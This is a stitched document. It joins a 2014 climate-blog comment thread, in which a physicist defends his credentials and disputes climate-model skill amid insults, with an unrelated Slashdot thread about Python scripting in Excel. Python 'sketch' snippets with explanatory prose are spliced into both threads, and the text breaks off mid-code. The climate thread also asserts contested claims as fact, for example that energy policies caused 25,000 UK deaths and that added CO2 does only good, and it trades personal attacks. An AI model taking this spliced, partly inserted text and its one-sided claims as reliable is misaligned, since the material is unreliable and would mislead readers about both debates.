glg rgbatduke September 9, 2014 at 9:42 am IMO the warmest interglacials, such as the Eemian (MIS 5), MIS 11 & MIS 19, were globally at least a few to several degrees hotter than now, & even in the Holocene, its warmest intervals have been more than one degree warmer than now. Sorry, I guess I forgot the block quote: Perhaps I misread this. Note that I didn’t talk about my second major in philosophy (irrelevant) or for that matter, my physics Ph.D. beyond the general topic of my dissertation. I was providing you with my experience in advanced applied mathematics (which you questioned), explaining that while I don’t have a Ph.D. in mathematics I have enough graduate courses and teaching experience to very likely be able to get one, if that mattered (theoretical physics is basically mathematics anyway), indicating that I have an enormous amount of practical experience with math modelling, computer simulation development/validation, computer software development, and big data analysis/data mining IN THE REAL WORLD. I thought I was just answering your explicit questions when you questioned my qualifications to comment on computer modeling. Data mining? Second company — really third. Computer simulations and modelling? Papers in Physical Review. Software development? I teach it, and have a few gazillion lines of code to my name, including writing the actual software that launched both of the companies above that do/did modeling and part of the key software for the third (security) company. So I’m puzzled. Why would you deny your own words in the very same thread in which they are clearly stated? Oh, and I forgot to note: I work for free. Sadly, the Big Oil companies have not seen fit to add me to their under-the-table payouts for doubting much of climate science. Not surprising, since energy companies in general are prime beneficiaries of the panic. rgb I stand corrected if you were “just” addressing my request for your real world experience, plus PhD in Math.
Forgive me my sins. You really don’t look that old, so how in the world did you achieve those earned PhDs and do all that real world work (for free?), and those zillions of lines of code in just a few decades? What languages do you code in? You do use OOP don’t you? Do you also design your own databases? What DBMS do you use to host the massive amount of data you probably analyze? Do you develop global warming and climate change models, or is your math modeling in physics? In any case, you appear to be the most qualified person in this comments thread and I have said so. I will check out your assertions. Thank you for your service. :-) For what it is worth, you may want to read this: Signing off now. On the whole, it’s been an awful experience. Good luck to everyone. :-) Now, back to some real work. You are forgiven, provided that the rest of the questions you continue to ask are actual questions, and not sarcasm intended to cast doubt on my qualifications. I’d have to say that your first post was exactly that, the second in reply to my statement of qualifications was in denial of your first, and I’m not certain about the third. You’ve probably left the thread, which is fine (because yes, people will hammer on you here — bear in mind that I spend as much time correcting people who want to “deny” that the GHE exists at all as I do casting IMO well-deserved doubt on the statistical or computational skill of the CMIP5 models that are (really) the sole basis of support for all of the predictions of doom and gloom) but in case you are still here I will answer your remaining questions as if they were indeed honest and not sarcasm. I’m 59 — so I’m probably older than you think, based on my picture. White beard. Largely absent hair. Pudgier than I should be. Recall that I don’t have a Ph.D. in math, or even a BS, but that doesn’t mean that I am in any way incompetent or narrowly educated in math either formally or on my own. 
The whole point of a Ph.D., BTW, is to learn to learn on your own, so you can continue to learn for a lifetime without further instruction. People don’t get a Ph.D. and then “freeze” their knowledge or skills the day after they get their dissertation finished. I have coded at least one program in at least the following languages (I doubt the list is complete): C, C++, PL1, Fortran (several flavors), assembler (several architectures), APL (I coded Mastermind in APL on an IBM 5100, a fact that at one time had me being accused of being John Titor:), Basic (several flavors), Pascal, Perl, Python, bash/bin/sh, tcsh, tcl/tk, matlab/octave, supermongo (don’t ask), awk, sed (if you consider sed scripts coding), PHP, and as I said, there are probably a few I’ve forgotten — javascript, java (but only barely), dunno… not really lisp, mathematica yes, and I forgot Macsyma and a Macsyma predecessor I can no longer remember the name of (working on implementing group theory products for complicated groups for my advisor back in the 80’s so he could test various theorems he was trying to prove)… I don’t, actually, prefer OOP. Consider that a sign of my age, if you like. One can program in object-oriented style in any language, but it is remarkably difficult to program procedurally in an OOP language as the syntax and methods conspire against it. Ditto, really, for list-oriented languages — never cared for them although sure, they are great for certain kinds of tasks. I have designed my own databases, but I taught myself all the databases I have used. Practically speaking I learned SQL in the context of implementing mysql and for a while put a mysql db behind several websites I ran more for grins than anything else. We used mysql in my first (neural net based) predictive modeling company, but my primary partner is/was a database consultant and is good at it so he actually wrote most of the mysql code and interface and I just used it or sometimes tweaked it.
In my more recent company an external consultant steered us towards mongo — the supermongo mentioned above is no relation — so I had to learn javascript and its objects and nosql interfaces. As it happened, mongo was an absolutely terrible choice (at that time, it was still somewhat under development) because its fundamental data structure was a data tree and one had to descend the tree to the leaves in order to do the equivalent of certain selects, which scaled like molasses when we were churning through many GB of data in deep tables. We backed off and went to mysql, and at that point I stopped writing most of the code and doing most of the actual work as we had employees who are better at DB work than I am and I’m not stupid. At this point I have no idea if we’ve gone to Oracle or something else — I doubt it, as I don’t “think” we will have exceeded mysql’s sensible capacity, but I am no longer involved in the daily running and don’t know. I don’t do much physics research any more (which is why climate science is my hobby, as it were) but when I did large simulations there was no point in storing more than e.g. random number seeds and processing the data as it came in, so I never had need for a DB (or even a spreadsheet) to manage data. Finally, I myself do not develop climate models, because I a) lack support for doing so and I work for a living doing other things, and one cannot develop climate models as a hobby, it’s pretty serious business; b) if I were to develop a climate model, I would start with an open source model such as CAM and not reinvent any wheels I didn’t need to. I’ve actually gone as far as downloading CAM 3.0, but (as usual, sadly) the code is a nightmarish rat’s nest and is far, far from build ready.
It would take even me (and yes, that is bragging) a week or two of serious work to get the code running on my local hardware, assuming it would fit; c) which is a problem, as my “local hardware” is now pretty much personally owned — my beowulf cluster of yesteryear is obsolete and gone away, and my personal “cluster” is a single multicore workstation plus a handful of multicore laptops. That actually might be enough to run CAM, slowly, on top of MPI, but to finish any sort of serious computation even to validate that the CAM build is working would take a long time. For a baaad meaning of the word long. In order to run and finish any sort of serious work in even your lifetime, I would need a real cluster, and to buy a real cluster I’d need support, see a). That hasn’t stopped me from reading the source code and documentation for CAM, and I have a pretty good idea of how it works. But you are naive in the extreme if you think that it is easy, or even possible, to do a serious check of CAM or any other GCM without substantial support. It’s a full-time job, really a full-time job for several people, and requires a dedicated parallel supercomputer with hundreds to thousands of nodes. Remember, they are trying to cover the 5 x 10^8 km^2 surface area (x 10 km in height, plus some possible cells in the ocean with depth) with cells that are at most 10^4 km^2 — CAM is more like 10^5 km^2. So one needs to integrate anywhere from 10^4 to 10^6 cells decades into the future in e.g. 5 minute timesteps, solving systems of coupled differential or difference equations with at least nearest neighbor coupling in a Markov approximation. This isn’t something you’re going to easily, or quickly, do on any small cluster, although CAM is coarse grained enough one probably COULD get it to run on a comparatively small cluster. Hopefully, that answers all of your questions.
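The cell-count arithmetic a few sentences back is easy to reproduce. A sketch — the surface area and cell sizes are the figures quoted above, while the ~26 vertical levels and the ten-year horizon are my own illustrative assumptions:

```python
# Reproduce the "10^4 to 10^6 cells" and "5 minute timestep" bookkeeping
# with explicit (and partly assumed) inputs.
earth_area_km2 = 5.1e8        # ~5 x 10^8 km^2 surface area, as quoted
cell_area_km2 = 1e4           # 100 km x 100 km cells (CAM is ~10x coarser)
levels = 26                   # assumed vertical resolution

columns = earth_area_km2 / cell_area_km2       # ~5.1e4 surface columns
cells = columns * levels                       # ~1.3e6 grid cells in total

minutes_per_decade = 10 * 365.25 * 24 * 60
steps_per_decade = minutes_per_decade / 5      # ~1.05e6 five-minute steps

cell_updates = cells * steps_per_decade        # ~1.4e12 updates per decade
```

Each of those trillion-plus updates involves solving coupled PDE terms with at least nearest-neighbor coupling, which is why even this coarse grid wants a dedicated cluster for decades-long integrations.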
Note well that one doesn’t have to run the code in order to decide whether or not you trust the result, any more than one has to personally perform a double blind, placebo controlled study to decide if you trust experimental evidence that an antibiotic can usually cure a particular disease. Nobody should trust a marginal result (one with a p-value close to the arbitrary level one considers “significant”) because of the ease of accidental data dredging and because the world is littered with the scientific corpses of well-reported marginal results. Everybody should trust a non-marginal result validated by multiple independent researchers (especially by at least a few with no vested interest or investment in the antibiotic in question), where the probability of the data given the null hypothesis of no effect is so small that it might as well be zero. Why do you think climate science models are any different, or get a “bye” on validation outside of training data? The really sad thing is that the IPCC openly acknowledges this, repeatedly, in the various ARs. I’m too lazy to look up the exact quotes, but AR3 clearly stated that the models had little skill, couldn’t be relied on to make quantitative predictions, and that this situation might well not change in the future due to the difficulty of the problem — before going on and using them to make quantitative projections, as if changing the name from skill-free “predictions” to unvalidated “projections” made it ok to use them as if they were predictions without the annoyance of having to survive a hypothesis test, that is, show some skill at solving the problem they were trying to solve in comparison with future data. A practice that continues today.
In a single paragraph in AR5 the following statement is made: Translation: We have no axiomatically defensible way of arguing that the MME mean is more accurate than any of the contributing models, and the variance of this mean is meaningless as an indicator of the probable error. In the next paragraph they then indicate that yes, they really should subject the individual models to a hypothesis test before including them, yes, they should use Bayesian methods to refine the models by altering their hypotheses to reduce disagreement with the real world or to make meaningful error estimates on their predictions, yes, they should take into account the non-independence of the models — none of this, of course, is actually done in figure 9.8a or in most of the work done on the basis of the models, but it certainly should be done. When it is done, it will rigorously reduce climate sensitivity and increase error estimates (because the models systematically run too hot, duh), which rigorously reduces the impetus to invest huge amounts of money ameliorating the hypothetical climate catastrophe. What if the corrected model(s) showed that there was no catastrophe to be expected? All of those modellers, potentially out of a job. All of those peasants who’ve paid hundreds of billions of dollars to fix a non-event, armed with pitchforks and torches. All of those congressional subpoenas. Heads could roll. Literally. Prison sentences might well loom if even a hint of academic dishonesty or a cavalier statistical treatment supported by confirmation bias and cherrypicking came to light, because this isn’t like making a self-correcting stupid mistake about seeing a trans-luminal neutrino and announcing it before it is thoroughly checked and confirmed; it costs real money and lives all over the world on the basis of statements made that trade on the presumed honesty of the science. The reputation of science itself would suffer, everywhere.
It’s one of many reasons I, and a surprising number of my colleagues, care, and don’t take the many pronouncements of doom as seriously as you might think that they do if you read silly contrived sound-bite statements such as “97% of scientists agree”. First, 97% of all scientists don’t agree on pretty much anything. Well, maybe gravity. Or maybe not even gravity. Isn’t that really just spacetime curvature? Or rather, I meant to say a field mediated by gravitons? Or is it really a matter of interactions in string theory at the Planck length? Perhaps not even gravity. Second, the polls quoted were silly polls, and didn’t ask the right questions. They poll one question, but then attribute the “97%” to a completely different conclusion, and the 97% itself is sketchy in the extreme. Honestly conducted polls find that only around 90% of climate scientists believe in anthropogenic global warming, and that over half of them think that there is now and will be some anthropogenic global warming in the future but it probably won’t be catastrophic. I’d guess that the fraction that “believe” in non-catastrophic warming is increasing, given that climate sensitivity is in free fall and will continue that way unless/until warming clearly resumes. Anyway, personally I hope you reconsider your decision to avoid WUWT and/or threads like this one. Yes, sometimes you’ll take some heat for daring to advance the notion that CAGW/CACC is a proven reality — but that’s the whole point of the venue. You can advance that point of view; but you’d better be prepared to defend it. And listen to people who will try very hard to convince you that you are wrong. No, the discussion won’t be devoid of logical fallacy, and people may call you names, but most of us disapprove of that when it does happen. 
rgb Khwarizmi, you lectured Peter on Logic 101, the ad hominem fallacy, yet you failed to similarly lecture those you agree with on their Furtive Fallacies, to wit: “climate scientists are in it for the funding,” “there is more milk in the teat,” etc. They attribute what they term as “alarmist” or even false reports on GW/CC to the claimed malfeasance of climate scientists. Shame on you and them. No one here seems to understand the basic science involved in GW/CC, nor how to properly study it, yet they throw their textbook equations and advanced degrees at each other like insecure children. Get into the real world and out of the ivory tower; they are two different realities. George Grubbs You write NO! You nasty little troll! You demanded the qualifications of rgbatduke and he gave them together with much other information, explanation and detail. You now pretend that he boasted of them when in reality he had replied to your demand. Academic qualifications are not taken as evidence of anything here, they are rarely cited, and they are ignored. They are NOT thrown at each other precisely to avoid the childish and untrue accusation you make and I have quoted. Your claim that rgbatduke doesn’t understand the basic science of the global warming scare is laughable in light of his reply to you. And several of us who contribute here have published on the subject! Are you an employed troll? If you are then your performance does not merit you getting your pay. Richard You need to seek help. Before you go see your psychiatrist, examine my statement to RGB who I have said here has presented solid and credible claims regarding the global warming issue. I hope his statements hold up to peer scrutiny. Here is my statement regarding his credentials that you so vehemently condemn while assassinating my character and reputation. I forgive you in advance of you asking for forgiveness. And, I hope you enjoy your mental masturbation. 
.” So, I am asking for his “experience.” He does not have much, if any, real world experience in the disciplines I mentioned that pertain to climate change forecasting. So, my mentally unstable friend, I wish you the best. And, don’t forget to take your meds! Oh, “I hope you guys win the Nobel Prize when you prove GW/CC false” as you spend hours upon hours trying to do here when you’re not insulting other commenters. Hey, write a paper and have it published in “Science.” See what kind of response you get. Have a nice day. :-) Providing them a false sense of security? Well, YOU are actually murdering people each year with your ACTUAL sense of security and faith-based belief in your models: Am I to stand by as innocents world-wide are crucified on your belief that the models and the government-paid so-called “scientists” are correct? 25,000 “excess” people died of the cold in the UK alone last year due to your energy policies and deliberate high prices mandated by the false CAGW promise of a possible heatup in year 2100 possibly causing problems maybe. So these 2,150,000 deaths between now and 2100 are the real result of YOUR fears of that possible problem, but many million others worldwide are killed each year literally by parasites (dirty water due to no concrete, no steel, no power to clean and distribute pure water, to treat their sewage, to store their food, to grow and harvest more food, to clean and wash their dishes, to filter their air now polluted as they cook their meals over the heat only possible by dried dung, harvested by hand from the animals they feed by hand). And YOU want that life of early deaths and lives spent in dirt, poverty, and want for these people? Why? Because YOU want them to die this way every day, in every other country of the world? 
The climate priests of your religion are far from objective: The objective facts are that today’s energy provides good results that people want and need, that save lives, improve their lives, and improve the world. The CO2 released from some of these energy systems also provides only good – only value, no measured dangers (except the propaganda spewed by your religion of a future harm unless we kill innocents now) and has resulted in a 7 to 23% increase in every plant growing worldwide in every country and province. More food, more fodder, more fuel, more farms, more fish and less famine! The climate priests whom you worship do have a job: That job is to justify to their government program managers the 1.3 trillion in new taxes and political control made possible by their computer programs promising uncertain future climate change so their politicians can maintain their control over the people living in their politicians’ world. Geez, again you commit logical fallacy after logical fallacy. “I am a murderer,” “faith-based belief,” “innocents are crucified,” “so-called” scientists, and so on ad nauseam. Argument from hyperbole, more strawmen arguments, more red herring arguments, false, shallow statements and claims with nothing to substantiate them … your response is nothing short of an emotional personal rant. I can’t have a reasonable and rational discussion with someone who continually commits these fallacies. We are not getting anywhere. I have more important things to think about and write about than constantly answering you and pointing out the weaknesses in your arguments. Therefore, I am retiring from this thread, seeing that I have to deal with dogmatism and beliefs that approach a trance-like religious state based on emotion and ignorance, and I believe, greed and self-interest (a personal belief based on common threads in the preponderance of ‘Comments’ responses). You will have to seek out someone else to ply your trade of illogical arguments on. 
My offer to assist you in developing a quantifiable alternative theory to the current theories of GW/CC scenarios still stands. By the way, my services will be free of charge, and I will supply the computer power, and brain power. G. George, this is the deny-o-sphere. You cannot expect logic and reason from people that reject basic science. But kudos for your efforts to bring rationality to this web site. REPLY: What you can expect though, is to be put in the bit bucket when you start calling people names, and make baseless taunts. Your claim about “rejecting basic science” should start here. – Anthony Thanks, you sound like a comforting voice from the wilderness. 25,000 died in the UK due to YOUR belief in Catastrophic Anthropogenic Global Warming and the UK/EU/US governments’ requirements that YOU support to “end it” (or control it) by deliberately increasing energy prices and deliberately restricting energy availability as YOU try to limit beneficial CO2 increases because YOU believe that CO2 must be limited. Now, why did they die? YOU. So, what is the hyperbole? They died. YOU caused those needless deaths because of YOUR beliefs in CAGW prevention that – unless limited by your actions – might cause harm in 2100. But. CO2 is not causing harm now. It is only creating good. It is increasing the life of every green plant on earth, and every living thing dependent on that plant for life. It is increasing the health and safety and life of each person using CO2 beneficially. And the potential harm that you fear is NOT occurring, and CANNOT be shown to be linked to any harm the past 18 years, the past 36 years, the past 360 years. George, you have not answered any one argument or sentence of the previous post. Your post says RACookPE1978’s post is full of logical fallacies, but fails to name one. Before posting your answer, please just try to read, understand what RACookPE1978 said and then if there is a flaw explain it clearly to him. 
You say: “I can’t have a reasonable and rational discussion with someone who continually commits these fallacies” but you do not even try a rational debate. Why is that? Are you so afraid of being proved wrong? Many people act out of what they sense to be “the right thing” and cannot bear to look critically and logically at what they are doing. Is it really the right thing to do? You say: “My offer to assist you in developing a quantifiable alternative theory to the current theories of GW/CC scenarios still stands.” There is no need to develop new theories. Why should RACookPE1978 or anybody have to develop a new theory to prove another wrong? The “catastrophic” GW theory (CAGW) is wrong, it is clearly failing to provide valid predictions. There are many flaws and false assumptions in the theory which are being highlighted again and again. So the question is why do you go to the lengths of ad hominem for a failed theory? The CO2 contribution to the warming itself might well be overstated, and feedbacks are clearly wrong. However the beneficial contributions from CO2 are clear for everybody who wants to look at: I have a BA in Political Science, an MA in Peace and Conflict Resolution and a Ph.D. in International Political Economy. All three disciplines are filled with reams of pseudoscience and unproductive methods of discourse that distract from learning. My studies do not provide me the ability to argue the science behind climate change. However, they do give me a keen radar for word salad. This thread is a spectacular example of wasted effort, where good information is continuously obscured by absolutist statements and personal attacks. Lars, go back and read my responses to RACook and you will see “ad hominem,” “red herring,” and others. I agree with Eric on these comments. That’s why I am going elsewhere to seek solid information on Matt Ridley’s assertions. RichardsCourtney: You have your timing wrong. 
I made the comment about some people throwing around degrees BEFORE RGB responded with his very long, detailed and unnecessary vita. George Grubbs Your post at September 9, 2014 at 3:29 pm says in total Those lies are merely more of your trolling. At September 7, 2014 at 10:00 am you wrote saying in total Two days later rgbatduke replied to that at September 9, 2014 at 9:42 am in a message that began And you responded less than an hour later with a pack of lies at September 9, 2014 at 10:52 am which began No, you malign liar, as rgbatduke pointed out at September 9, 2014 at 3:31 pm you very specifically “questioned {his} credentials” when you wrote, “But what experience does he have in advanced applied mathematics (is he a PhD mathematician?), math modeling, computer simulation development/validation, computer software development, and big data analysis/data mining IN THE REAL WORLD?” But you did not withdraw. Instead, you had the brass neck to try to excuse your lies in your posts at September 9, 2014 at 3:53 pm and September 9, 2014 at 4:18 pm where you said you were “signing off” but did not. rgbatduke replied at September 10, 2014 at 8:48 am by providing additional CV. And then you started to throw around insults like confetti. At that I made a post in hope of stopping your disruption or – at least – avoiding your wasting more time and effort from rgbatduke because his time and effort are highly valued here. At September 9, 2014 at 10:05 am I wrote this post which says in total And that resulted in your post I am answering which – as I have itemised – consists entirely of lies. And, importantly, does not answer (nor mention) my question. You really, really are a most unpleasant and egregious troll. Please take your disruptive lies elsewhere. 
Richard I must say that many of these statements and purported arguments sound very much like they come from “Tea Party” true believers – those same types of arguments that try to shoot down the Theory of Evolution and surreptitiously try to sneak “Creationism” into our schools’ science curricula. RGB is the only commenter I have read that has said anything of substance, but his claims need to be validated. George Grubbs I must say that all of your statements and purported arguments sound very much like they come from the Mad Hatter’s Tea Party. Your statements are mostly falsehoods, say nothing of substance, and fail to withstand scrutiny. Richard Get real guys. Climate change is real and serious. We have increased CO2 levels worldwide by 50% in the last 100 years or so and we are paying the price already. We currently have no way of taking the carbon dioxide back out of the atmosphere and we have vastly reduced mother nature’s forests so we can’t expect much help from her. The world’s climate is not stable and we have pushed it too far. We need to stop pumping out more and get our grandchildren ready for a rough ride.
https://wattsupwiththat.com/2014/09/05/matt-ridley-in-the-wsj-whatever-happened-to-global-warming/
Microsoft Considers Adding Python As an Official Scripting Language in Excel (bleepingcomputer.com) 181 An anonymous reader writes: Microsoft is considering adding Python as one of the official Excel scripting languages, according to a topic on Excel's feedback hub opened last month. Since it was opened, the topic has become the most voted feature request, double the votes of the second-ranked proposition. "Let us do scripting with Python! Yay! Not only as an alternative to VBA, but also as an alternative to field functions (=SUM(A1:A2))," the feature request reads, as opened by one of Microsoft's users. Obligatory (Score:2) I just felt a great disturbance in the Net, as if millions of hackers were preparing to attack. Re: (Score:2) Be right back, I have to start a rumour that Microsoft is going to use Rust for something. With Excel + Python, (Score:5, Insightful) Re: (Score:3) Probably not any more than what one could accomplish with VB and Excel. I really don't think that Python would be something that non-programmers would really embrace. Even as a software developer I struggle to see the purpose of using a language where white space is significant. That is about my only real gripe with the language, but it's the one reason I don't know it very well, because I find an alternative I'm much more comfortable with for just about every project. Re: (Score:2, Insightful). Re:With Excel + Python, (Score:5, Interesting) nah, semicolons are there no matter what. Changing editors can *totally* mess up the whitespace. Yes, literal spaces will help, but all it takes is one idiot/mistake and the codebase is pooched. That and the fact that 2.x code can't run virtually unmodified on 3.x interpreters really pisses me off. Perl, for all its warts, just needs use perl4; at the top of the file right after the crunchbang and you're good to go with an old as dirt script on the newest interpreters. Re: (Score:1) Changing editors can *totally* mess up the whitespace. 
If you don't know how to operate your editor. Re: (Score:2) Honestly, of all my gripes with Python, the whitespace is pretty low. You learn about it in the first day or so and move on. Same with the 2-to-3 thing. While you are learning, chances are you will only be dealing with one version. When you need to support both, it's not that hard - most of the critical libraries have been back-ported to 2, so you just try importing things and catching exceptions, and do a few imports from __future__. If you stay cognizant of 3-only features, it's really not much work to ke Re: With Excel + Python, (Score:1) Re: (Score:2, Offtopic) Why? It's not a developer's job to become an editor guru but to code. Anything that interferes with that is wrong. Re: With Excel + Python, (Score:2) Re: (Score:2) You don't get it. Tools should be easy to use so you can focus on what you need to do, Programming Motherfucker! Re: With Excel + Python, (Score:2) Re: (Score:2) No. Just lazy in the right way. Now get to work playing with your tool. Re: (Score:2) Off topic? I was expressing an obvious point about the tool assisting getting the job done instead of hindering it. Re: (Score:2, Insightful) You are _completely_ missing the point. Form should NOT matter for function. A compiler has one job -- translate code. It shouldn't matter if there is EXTRA (leading) whitespace for operations. There are times where placing multiple operations on one line make the code MORE readable; so yeah, having a statement separator is a big deal. It isn't 1970 anymore where we have to place 1 operation on 1 line. Some of us have evolved to writing code two dimensionally WHERE it makes sense too. Python, started off wit Re: (Score:2) The idit is you. As obviously millions of programmers use Phython and like it. Chances are: you are indenting your code the exact same why a Phython programmer does. If that is the case, that makes you look even more retarded. Re: (Score:2) > The idit is you. 
*irony* Failed spell checking when name calling *facepalm* Re: (Score:2) I belong to the lucky people that can read and comprehend stuff that has spelling errors. :D Because I'm so super enhanced in my visual cortex, I simply don't see them Static typing and APIs (Score:2) Look at a piece of code you wrote. 90% of the statements will be on one line. So does it make more sense to use a character for new lines. Or one for continuations -- the 10% case. But far more important is that VBA has static typing which Python does not. That becomes very important as programs become larger. But far more important than that is that Microsoft have a new API for JavaScript (and I presume Python) rather than the traditional COM/VBA one. And the new API is awful. But Microsoft MBAs follow fashion, Re: (Score:3) VBA has static typing which Python does not. (a) Python has strong typing, just dynamic rather than static. Most Python developers would tell you, and I would agree, that you should be testing your code with unit tests and assertions, and catching type errors at runtime is acceptable. (b) Some Python developers, including the "Benevolent Dictator for Life" Guido van Rossum, feel that Python should have optional static typing, and it is now available. If you think it would help you, you can simply start usin Re: (Score:2) Sure, like VBA, Python checks types at runtime as well. But that is no replacement for static typing, which is the common case. By relying on automated tests with 100% code coverage you are saying that Python is only suitable for professional developers. VBA is mainly used by people whose expertise is not programming. It is really nice to know that once your code compiles, one large class of potential errors will be absent. And VBA could (but does not) be compiled to efficient code without relying on compl Re: (Score:2) you are saying that Python is only suitable for professional developers Actually, I never said any such thing. 
IMHO Python is just plain an all-around easy to use language that's easy to understand. Every language has some weird stuff that you just have to get past to understand how it works; Python has less of it than any other language I've used. My nephew was able to write working Python programs at age 10... he didn't spend any time on "automated tests with 100% code coverage" and yet his programs wor Re: (Score:2) you're focusing on the issue without also acknowledging when I point out *why* it's still an issue: all it takes is one idiot/mistake If I'm taking in code from others and one of those patches is crap then poof. As a result I have an extra layer of work (whitespace validation) for *all* contributors because some may be an idiot. That's my issue with the whitespace. Re: With Excel + Python, (Score:2) Re: (Score:2) why does the language add a fragility to the parser that is broken by something so easily? And note that the opposite issue, a dev that contributes to multiple projects will find that they have to maintain different editor profiles to match the projects' needs. All it takes is errantly working on a project with the wrong settings in the editor and the same issue manifests. In both cases the language has imposed a work penalty on the process of contributing code that can not be avoided. That is an issue. Re: With Excel + Python, (Score:2) Re: With Excel + Python, (Score:2) HTML can't handle Python spaces. Lots of systems will parse out spaces/tabs and have some conversion. Hence exchanging/saving code in Python is hard. Re: With Excel + Python, (Score:2) Re: (Score:3) Use tabs. If some idiot (or their editor) puts spaces in the code, search and replace them with tabs. It's not a problem. Re: (Score:2) why? it's not my job to clean up other's code. My job is to code. Re: (Score:2) Use spaces. If some idiot (or their editor) puts tabs in the code, search and replace them with spaces. Then find the idiot that put in the tabs and have them shot. 
It's not a problem. Re: (Score:2) Changing editors can *totally* mess up the whitespace. Not if you have been following Python's official standard (called PEP 8 [python.org]) and you have been using all spaces. I use vim, and vim has a setting to auto-expand tabs to spaces, plus I use the autoindent, so my code is always correctly indented and I never really need to think about it. Also, with Python 3, it's no longer just a warning if someone sabotages your white space by inserting some tabs; it's an error. So if someone does somehow sabotage the code b Re: (Score:3) Semicolons are visible characters and can be distinguished from other visible characters without regard to if the font used is fixed width or proportional. Spaces can't reliably be distinguished from other non-visible characters (such as tab). Yes, spaces and tabs have a "visible" effect, but the characters themselves are not visible and how they are rendered on various display and print devices does not guarantee that you can visually determine the indent level (and consequently the scope or program Re: (Score:2) VBA does not use semicolons. It uses end of lines. Which is how people write code. Re: (Score:2) One of my gripes, other than the Fortran white space which was abandoned in F90, is the horrible way string handling is done, though there are other things which are over convoluted. Reasonable languages consider regex a cross cutting concern. But in over objectioned languages it looks like:
>>> import re
>>> p = re.compile('[a-z]+')
>>> p.match("")
>>> print(p.match(""))
While in Perl it looks like:
$x = "abcde"; $result = $x =~ /abc/; print $result;
Most programming languages know about cro Re: (Score:2) I think this is probably the reason Microsoft settled on VB in the first place. It's a far stretch from a perfect language, but it does have some nice qualities for managerial types such as no semicolons, case insensitive syntax, and white space isn't significant. 
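The tab-versus-space hazards debated above can be seen directly in plain Python 3, which refuses to compile indentation that mixes tabs and spaces ambiguously, raising TabError rather than guessing a tab width. A minimal sketch, assuming only a stock CPython 3 interpreter:

```python
# Sketch: Python 3 rejects ambiguous tab/space mixing at compile time.
# The first body line is indented with a tab, the second with eight
# spaces; their relative depth would depend on the tab width, so the
# tokenizer raises TabError instead of guessing.
source = "if True:\n\tx = 1\n        y = 2\n"

try:
    compile(source, "<pasted>", "exec")
    print("compiled cleanly")
except TabError as exc:
    print("TabError:", exc)
```

This is why the sabotage described above is caught loudly under Python 3, whereas Python 2 only flagged it when run with the -t/-tt options.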
Re: (Score:2) Big data analysis and AI like Python so adding it to Excel keeps Excel in the game....plus Excel is huge in quantitative analysis. Re: (Score:2) I wonder how many more applications my boss can dream up for Excel that it really should never, ever have been used for? Ironically, Python can make many spreadsheets unnecessary in the first place. In my case, for 90% of the things that I would have done in Excel circa 1995, today I instead just whip up a plain Python script to compute. Usually the results go into a flat text table, sometimes I even have it spit out a chart in SVG format. A script is typically much more readable and maintainable than a spreadsheet with a bunch of hidden formulas. It also fits better with version control systems. Re: (Score:3) Pandas with Numpy/Scipy has made it fairly simple to do a lot of things that I used to do in Excel, without the weirdness and performance limitations of Excel. Also, interactive charts... why doesn't Excel have these by now? Matlab figured it out like 20 years ago. Re: (Score:2) how? Re: (Score:2) Nothing for a very long time if they decide to go ahead. They introduced JavaScript as a VBA alternative in 2013. It's now 4 years later and while they've added a lot of APIs, there are still a ton left to go. Splitting their API resources between Python and JS seems like the perfect way to get neither any time soon (and a great way to bike shed both out of existence altogether). Yeah.... (Score:4, Funny) ... that won't result in increasing the attack surface. (eye roll) Re: (Score:2) Seems like being rid of VB script and replacing it with Python would be a security win. Re: (Score:2) Who said MS was getting rid of VB script? When all you have is a hammer (Score:2) I, for one, eagerly await reading about the new and exciting kind of WTFs that would result from this in The Daily WTF [thedailywtf.com] if this comes to pass. Great idea! 
(Score:2) Re: (Score:2) just imagine the ability to connect multiple AIs with this! One tensor flow connection per cell, cells referencing other cells. No wonder Skynet tries to kill humanity, we grew it in Excel! It all makes sense now! Good riddance to VBA (Score:2, Troll) I heartily agreed with Edsger Dijkstra when he said "the teaching of BASIC should be rated as a criminal offence: it mutilates the mind beyond recovery." The only reason why I've kept my VBA skills up is Excel - I find that I have to do a macro or two every three to six months and the process of getting my head around BASIC never seems to be simple and makes going back to C/C++/Python a chore. Hopefully WebAssembly will help me get rid of that other programming abomination that I have to deal with - Javascrip Good idea (Score:2, Insightful) Re: (Score:3) Is it a good thing to help idiots to build more powerful Office-powered clusterfucks? This is like building a cheap and reliable cell-phone-triggered detonator: In the most technical sense, you made an improvement, but what if you consider what they're used for? Re: (Score:2) Curious news (Score:2) Re: (Score:1) Anybody who uses .Net isn't going to bother writing programs in Excel. VS2017 is free, and includes VSTO. VSTO encourages using Excel files as data storage and not as scripting. Which is proper. Anyone who can use VSTO is going to write a separate program that consumes and emits data files, if that's a needed task, rather than embedding program and data into one binary clusterfuck. But all that being said, people who "just want it to work" are still clueless normies that are going to abuse broken designs and Re: (Score:2) Re:Curious news (Score:4, Interesting) Python is a .NET language. Microsoft's IronPython compiles to .NET and uses the .NET framework instead of Python's regular packages. 
And VB.NET is not really "a new version of VB6" at all - it's a whole different language that's more like C# with its syntax altered to visually resemble BASIC. It doesn't behave like VB at all. Re: (Score:1) Python is a .NET language. Microsoft's IronPython compiles to .NET and uses the .NET framework instead of Python's regular packages. I meant the properly-speaking .NET languages (C# & VB.NET), simply because I don't have too much experience in the other ones and I am not sure about how well they support all the .NET features. In any case, it seems [wikipedia.org] that IronPython isn't a Microsoft implementation. External libraries allowing a given programming language to communicate with .NET are relatively common, but that fact doesn't convert the given language into a .NET one. And VB.NET is not really "a new version of VB6" at all Seriously? Then, what do you call the transition from the old VB to the Re: (Score:3, Informative) VB.Net is .Net first and VB second. For example, if you type If foo = "1234" Then, it's doing some wonky-ass classic VB shit in the background (implemented in the Microsoft.VisualBasic namespace syntax shims) to allow variable foo to be an Int32 and still compare without a type mismatch. If, in C#, you try the same thing with if(foo == "1234") and foo is an int/Int32, it's going to flip its shit at compile time. But best of all, in either language, you can do If foo.op_Equality("1234") Then (or if(foo.op_Equ Re: (Score:2) VB.Net is .Net first and VB second. I never said otherwise. Anecdotally, when writing VB.NET code, I always rely on pure .NET rather than on VB functionalities. My whole point was that, regardless of the evident differences between both of them, VB.NET is the evolution of VB (or VB the old version of VB.NET). You might even consider the whole .NET (and consequently also C#) an evolution of VB; exactly the same as VB was an evolution of Basic. This was my whole point. 
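The comparison semantics discussed in this subthread can be contrasted with Python in a short sketch. Unlike the classic-VB coercion described above, Python's == never silently converts an int to a string, and its optional annotations (PEP 484) are hints for external checkers such as mypy, not runtime enforcement; the total function below is purely illustrative:

```python
# Sketch: Python is strongly typed even though it is dynamically typed.
foo = 1234
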